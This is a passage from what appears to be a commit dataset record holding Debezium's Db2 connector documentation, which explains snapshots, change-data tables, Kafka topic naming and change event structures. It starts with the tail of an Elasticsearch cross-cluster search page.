on.\n+\nimage:images\/ccs\/ccs-min-roundtrip-cluster-results.svg[]\n\n. The coordinating node sends a search request to each shard, including those in\nits own cluster. Each shard performs the search request independently.\n+\n[WARNING]\n====\nWhen network roundtrips aren't minimized, the search is executed as if all data\nwere in the coordinating node's cluster. We recommend updating cluster-level\nsettings that limit searches, such as `action.search.shard_count.limit`,\n`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for\nthis. If these limits are too low, the search may be rejected.\n====\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-search.svg[]\n\n. Each shard sends its search results back to the coordinating node.\n+\nimage:images\/ccs\/ccs-dont-min-roundtrip-shard-results.svg[]\n\n. 
After collecting results from each cluster, the coordinating node returns the\nfinal results in the {ccs} response.\n+\nimage:images\/ccs\/ccs-min-roundtrip-client-response.svg[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f8f0d7d8a0ae4b4bde60ab6af83f2d41a74d120","subject":"DBZ-2122 Add Db2 topic for capture job configuration","message":"DBZ-2122 Add Db2 topic for capture job configuration\n","repos":"debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/db2.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-db2\"]\n= {prodname} connector for Db2\n\n:context: db2\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into \"capture mode\". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.\n\nA table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.\n\nThe first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.\n\nWhen the snapshot is complete the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. 
Applications and services consume change events from these topics.\n\n[NOTE]\n====\nThe connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 zOS.\nTo use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product.\nHowever, IIDR does not need to be installed.\n====\n\nifdef::community[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nIt is expected that the connector would also work on other platforms such as Windows,\nand we'd love to get your feedback if you can confirm this to be the case.\nendif::community[]\n\nifdef::product[]\nThe Db2 connector has been tested with Db2\/Linux {db2-version}.\nendif::product[]\n\nifdef::product[]\nInformation and procedures for using a {prodname} Db2 connector is organized as follows:\n\n* xref:overview-of-debezium-db2-connector[]\n* xref:how-debezium-db2-connectors-work[]\n* xref:descriptions-of-debezium-db2-connector-data-change-events[]\n* xref:how-debezium-db2-connectors-map-data-types[]\n* xref:setting-up-db2-to-run-a-debezium-connector[]\n* xref:deploying-debezium-db2-connectors[]\n* xref:monitoring-debezium-db2-connector-performance[]\n* xref:managing-debezium-db2-connectors[]\n* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} Db2 connector\n\/\/ ModuleID: overview-of-debezium-db2-connector\n[[db2-overview]]\n== Overview\n\nThe {prodname} Db2 connector is based on the link:https:\/\/www.ibm.com\/support\/pages\/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture\/Apply agents]\nthat enable SQL Replication in Db2. A capture agent:\n\n* Generates change-data tables for tables that are in capture mode.\n* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.\n\nThe {prodname} connector uses a SQL interface to query change-data tables for change events.\n\nThe database administrator must put the tables for which you want to capture changes into capture mode. For convenience and for automating testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:\n\n* Start, stop, and reinitialize the ASN agent\n* Put tables into capture mode\n* Create the replication (ASN) schemas and change-data tables\n* Remove tables from capture mode\n\nAlternatively, you can use Db2 control commands to accomplish these tasks.\n\nAfter the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.\n\nTypically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. 
Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.\n\n{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-db2-connectors-work\n\/\/ Title: How {prodname} Db2 connectors work\n[[how-the-db2-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} Db2 connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and handles schema changes.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-db2-connectors-perform-database-snapshots[]\n* xref:how-debezium-db2-connectors-read-change-data-tables[]\n* xref:default-names-of-kafka-topics-that-receive-db2-change-event-records[]\n* xref:about-the-debezium-db2-connector-schema-change-topic[]\n* xref:debezium-db2-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-db2-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} Db2 connectors perform database snapshots\n[[db2-snapshots]]\n=== Snapshots\n\nDb2's replication feature is not designed to store the complete history of database changes. Consequently, when a {prodname} Db2 connector connects to a database for the first time, it takes a consistent snapshot of tables that are in capture mode and streams this state to Kafka. This establishes the baseline for table content.\n\nBy default, when a Db2 connector performs a snapshot, it does the following:\n\n. Determines which tables are in capture mode, and thus must be included in the snapshot. By default, all non-system tables are in capture mode. Connector configuration properties, such as `table.exclude.list` and `table.include.list`, let you specify which tables should be in capture mode.\n. Obtains a lock on each of the tables in capture mode. This ensures that no schema changes can occur in those tables during the snapshot.\nThe level of the lock is determined by the `snapshot.isolation.mode` connector configuration property.\n. Reads the highest (most recent) LSN position in the server's transaction log.\n. Captures the schema of all tables that are in capture mode. The connector persists this information in its internal database history topic.\n. Optionally, releases the locks obtained in step 2. Typically, these locks are held for only a short time.\n. At the LSN position read in step 3, the connector scans the capture mode tables as well as their schemas. During the scan, the connector:\n.. 
Confirms that the table was created before the start of the snapshot. If it was not, the snapshot skips that table. After the snapshot is complete and the connector starts emitting change events, the connector produces change events for any tables that were created during the snapshot.\n.. Produces a _read_ event for each row in each table that is in capture mode. All _read_ events contain the same LSN position, which is the LSN position that was obtained in step 3.\n.. Emits each _read_ event to the Kafka topic that has the same name as the table.\n. Records the successful completion of the snapshot in the connector offsets.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} Db2 connectors read change-data tables\n[id=\"how-debezium-db2-connectors-read-change-data-tables\"]\n=== Change-data tables\n\nAfter a complete snapshot, when a {prodname} Db2 connector starts for the first time, the connector identifies the change-data table for each source table that is in capture mode. The connector does the following for each change-data table:\n\n. Reads change events that were created between the last stored, highest LSN and the current, highest LSN.\n. Orders the change events according to the commit LSN and the change LSN for each event. This ensures that the connector emits the change events in the order in which the table changes occurred.\n. Passes commit and change LSNs as offsets to Kafka Connect.\n. Stores the highest LSN that the connector passed to Kafka Connect.\n\nAfter a restart, the connector resumes emitting change events from the offset (commit and change LSNs) where it left off. While the connector is running and emitting change events, if you remove a table from capture mode or add a table to capture mode, the connector detects this and modifies its behavior accordingly.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-db2-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} Db2 change event records\n[[db2-topic-names]]\n=== Topic names\n\nBy default, the Db2 connector writes change events for all insert, update, and delete operations on a single table to a single Kafka topic. The name of the Kafka topic has the following format:\n\n_databaseName_._schemaName_._tableName_\n\n_databaseName_:: The logical name of the connector as specified with the `database.server.name` connector configuration property.\n\n_schemaName_:: The name of the schema in which the operation occurred.\n\n_tableName_:: The name of the table in which the operation occurred.\n\nFor example, consider a Db2 installation with the `mydatabase` database, which contains four tables in the `MYSCHEMA` schema: `PRODUCTS`, `PRODUCTS_ON_HAND`, `CUSTOMERS`, and `ORDERS`. The connector would emit events to these four Kafka topics:\n\n* `mydatabase.MYSCHEMA.PRODUCTS`\n* `mydatabase.MYSCHEMA.PRODUCTS_ON_HAND`\n* `mydatabase.MYSCHEMA.CUSTOMERS`\n* `mydatabase.MYSCHEMA.ORDERS`\n\nTo configure a Db2 connector to emit change events to differently named Kafka topics, see the documentation for the {link-prefix}:{link-topic-routing}#topic-routing[topic routing transformation].\n\n
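For example, to route the change events for all four of the `MYSCHEMA` tables above into a single topic, you can apply the topic routing SMT in the connector configuration. The following is a minimal sketch: the SMT class and its `topic.regex`\/`topic.replacement` options come from the {prodname} topic routing transformation, while the transform name `Reroute` and the target topic name are hypothetical.\n\n[source,properties]\n----\ntransforms=Reroute\ntransforms.Reroute.type=io.debezium.transforms.ByLogicalTableRouter\ntransforms.Reroute.topic.regex=mydatabase\\.MYSCHEMA\\.(.*)\ntransforms.Reroute.topic.replacement=mydatabase.MYSCHEMA.all_tables\n----\n\n\/\/ Type: concept\n\/\/ Title: About the {prodname} Db2 connector schema change topic\n[id=\"about-the-debezium-db2-connector-schema-change-topic\"]\n=== Schema change topic\n\nFor a table that is in capture mode, the {prodname} Db2 connector stores the history of schema changes to that table in a database history topic. 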
This topic reflects an internal connector state and you should not use it. If your application needs to track schema changes, there is a public schema change topic. The name of the schema change topic is the same as the logical server name specified in the connector configuration.\n\n[WARNING]\n====\nThe format of messages that a connector emits to its schema change topic is in an incubating state and can change without notice.\n====\n\n{prodname} emits a message to the schema change topic when:\n\n* A new table goes into capture mode.\n* A table is removed from capture mode.\n* During a {link-prefix}:{link-db2-connector}#db2-schema-evolution[database schema update], there is a change in the schema for a table that is in capture mode.\n\nA message to the schema change topic contains a logical representation of the table schema, for example:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n ...\n },\n \"payload\": {\n \"source\": {\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"db2\",\n \"ts_ms\": 1588252618953,\n \"snapshot\": \"true\",\n \"db\": \"testdb\",\n \"schema\": \"DB2INST1\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": null,\n \"commit_lsn\": \"00000025:00000d98:00a2\",\n \"event_serial_no\": null\n },\n \"databaseName\": \"TESTDB\", \/\/ <1>\n \"schemaName\": \"DB2INST1\",\n \"ddl\": null, \/\/ <2>\n \"tableChanges\": [ \/\/ <3>\n {\n \"type\": \"CREATE\", \/\/ <4>\n \"id\": \"\\\"DB2INST1\\\".\\\"CUSTOMERS\\\"\", \/\/ <5>\n \"table\": { \/\/ <6>\n \"defaultCharsetName\": null,\n \"primaryKeyColumnNames\": [ \/\/ <7>\n \"ID\"\n ],\n \"columns\": [ \/\/ <8>\n {\n \"name\": \"ID\",\n \"jdbcType\": 4,\n \"nativeType\": null,\n \"typeName\": \"int identity\",\n \"typeExpression\": \"int identity\",\n \"charsetName\": null,\n \"length\": 10,\n \"scale\": 0,\n \"position\": 1,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"FIRST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 2,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"LAST_NAME\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 3,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n },\n {\n \"name\": \"EMAIL\",\n \"jdbcType\": 12,\n \"nativeType\": null,\n \"typeName\": \"varchar\",\n \"typeExpression\": \"varchar\",\n \"charsetName\": null,\n \"length\": 255,\n \"scale\": null,\n \"position\": 4,\n \"optional\": false,\n \"autoIncremented\": false,\n \"generated\": false\n }\n ]\n }\n }\n ]\n }\n}\n----\n\n.Descriptions of fields in messages emitted to the schema change topic\n[cols=\"1,3,6\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`databaseName` +\n`schemaName`\n|Identifies the database and the schema that contain the change.\n\n|2\n|`ddl`\n|Always `null` for the Db2 connector. For other connectors, this field contains the DDL responsible for the schema change. This DDL is not available to Db2 connectors.\n\n|3\n|`tableChanges`\n|An array of one or more items that contain the schema changes generated by a DDL command.\n\n|4\n|`type`\na|Describes the kind of change. 
The value is one of the following:\n\n* `CREATE` - table created\n* `ALTER` - table modified\n* `DROP` - table deleted\n\n|5\n|`id`\n|Full identifier of the table that was created, altered, or dropped.\n\n|6\n|`table`\n|Represents table metadata after the applied change.\n\n|7\n|`primaryKeyColumnNames`\n|List of columns that compose the table's primary key.\n\n|8\n|`columns`\n|Metadata for each column in the changed table.\n\n|===\n\nIn messages to the schema change topic, the key is the name of the database that contains the schema change. In the following example, the `payload` field contains the key:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"databaseName\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.SchemaChangeKey\"\n },\n \"payload\": {\n \"databaseName\": \"TESTDB\"\n }\n}\n----\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-db2-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} Db2 connector-generated events that represent transaction boundaries\n[[db2-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich change data event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from the given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"00000025:00000d08:0025\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"testDB.dbo.tablea\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"testDB.dbo.tableb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nThe connector emits transaction events to the `_database.server.name_.transaction` topic.\n\n.Data change event enrichment\n\nWhen transaction metadata is enabled the connector enriches the change event `Envelope` with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"00000025:00000d08:0025\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-db2-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} Db2 connector data change events\n[[db2-events]]\n== Data change events\n\nThe {prodname} Db2 connector 
generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the four basic parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure the converter to produce them. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n }\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-db2-connector}#db2-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-db2-connector}#db2-topic-names[topic names].\n\n
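Whether the `schema` portions appear at all is controlled by the converter, not by the connector. For example, the following standard Kafka Connect worker properties (a minimal sketch) configure the JSON converter to emit all four parts; setting the `schemas.enable` options to `false` would strip the `schema` fields and leave only the payloads:\n\n[source,properties]\n----\nkey.converter=org.apache.kafka.connect.json.JsonConverter\nkey.converter.schemas.enable=true\nvalue.converter=org.apache.kafka.connect.json.JsonConverter\nvalue.converter.schemas.enable=true\n----\n\n[WARNING]\n====\nThe {prodname} Db2 connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. 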
Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n\nAlso, Db2 names for databases, schemas, and tables can be case sensitive. This means that the connector could emit event records for more than one table to the same Kafka topic.\n====\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:about-keys-in-debezium-db2-change-events[]\n* xref:about-values-in-debezium-db2-change-events[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-db2-change-events\n\/\/ Title: About keys in {prodname} db2 change events\n[[db2-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table.\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [ \/\/ <2>\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n }\n ],\n \"optional\": false, \/\/ <3>\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Key\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"ID\": 1004\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`mydatabase.MYSCHEMA.CUSTOMERS.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: +\n\n* `mydatabase` is the name of the connector that generated this event. +\n* `MYSCHEMA` is the database schema that contains the table that was changed. 
+\n* `CUSTOMERS` is the table that was updated.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `ID` field whose value is `1004`.\n\n|===\n\n\/\/\/\/\n[NOTE]\n====\nAlthough the `column.exclude.list` connector configuration property allows you to omit columns from event values, all columns in a primary or unique key are always included in the event's key.\n====\n\n[WARNING]\n====\nIf the table does not have a primary or unique key, then the change event's key is null. The rows in a table without a primary or unique key constraint cannot be uniquely identified.\n====\n\/\/\/\/\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-db2-change-events\n\/\/ Title: About values in {prodname} Db2 change events\n[[db2-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample table that was used to show an example of a change event key:\n\n.Example table\n[source,sql,indent=0]\n----\nCREATE TABLE customers (\n ID INTEGER IDENTITY(1001,1) NOT NULL PRIMARY KEY,\n FIRST_NAME VARCHAR(255) NOT NULL,\n LAST_NAME VARCHAR(255) NOT NULL,\n EMAIL VARCHAR(255) NOT NULL UNIQUE\n);\n----\n\nThe event value portion of every change event for the `customers` table specifies the same schema. The event value's payload varies according to the event type:\n\n* <<db2-create-events,_create_ events>>\n* <<db2-update-events,_update_ events>>\n* <<db2-delete-events,_delete_ events>>\n\n[[db2-create-events]]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ID\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"FIRST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"LAST_NAME\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"EMAIL\"\n }\n ],\n \"optional\": true,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Value\",\n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n 
\"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"schema\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"change_lsn\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"commit_lsn\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.db2.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mydatabase.MYSCHEMA.CUSTOMERS.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"before\": null, \/\/ <6>\n \"after\": { \/\/ <7>\n \"ID\": 1005,\n \"FIRST_NAME\": \"john\",\n \"LAST_NAME\": \"doe\",\n \"EMAIL\": \"john.doe@example.org\"\n },\n \"source\": { \/\/ <8>\n \"version\": \"{debezium-version}\",\n \"connector\": \"db2\",\n \"name\": \"myconnector\",\n \"ts_ms\": 1559729468470,\n \"snapshot\": false,\n \"db\": \"mydatabase\",\n \"schema\": \"MYSCHEMA\",\n \"table\": \"CUSTOMERS\",\n \"change_lsn\": \"00000027:00000758:0003\",\n \"commit_lsn\": \"00000027:00000758:0005\"\n },\n \"op\": \"c\", \/\/ <9>\n \"ts_ms\": 1559729471739 \/\/ <10>\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table.\n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mydatabase.MYSCHEMA.CUSTOMERS.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. The connector uses this schema for all rows in the `MYSCHEMA.CUSTOMERS` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._schemaName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\na|`io.debezium.connector.db2.Source` is the schema for the payload's `source` field. This schema is specific to the Db2 connector. The connector uses it for all events that it generates.\n\n|4\n|`name`\na|`mydatabase.MYSCHEMA.CUSTOMERS.Envelope` is the schema for the overall structure of the payload, where `mydatabase` is the database, `MYSCHEMA` is the schema, and `CUSTOMERS` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that JSON representations of events are much larger than the rows they describe. This is because a JSON representation must include the schema portion and the payload portion of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`before`\n|An optional field that specifies the state of the row before the event occurred. 
When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content.\n\n|7\n|`after`\n|An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `ID`, `FIRST_NAME`, `LAST_NAME`, and `EMAIL` columns.\n\n|8\n|`source`\na| Mandatory field that describes the source metadata for the event. The `source` structure shows Db2 information about this change, which provides traceability. It also has information you can use to compare to other events in the same topic or in other topics to know whether this event occurred before, after, or as part of the same commit as other events. The source metadata includes:\n\n* {prodname} version\n* Connector type and name\n* Timestamp for when the change was made in the database\n* Whether the event is part of an ongoing snapshot\n* Name of the database, schema, and table that contain the new row\n* Change LSN\n* Commit LSN (omitted if this event is part of a snapshot)\n\n|9\n|`op`\na|Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are:\n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies only to snapshots)\n\n|10\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the 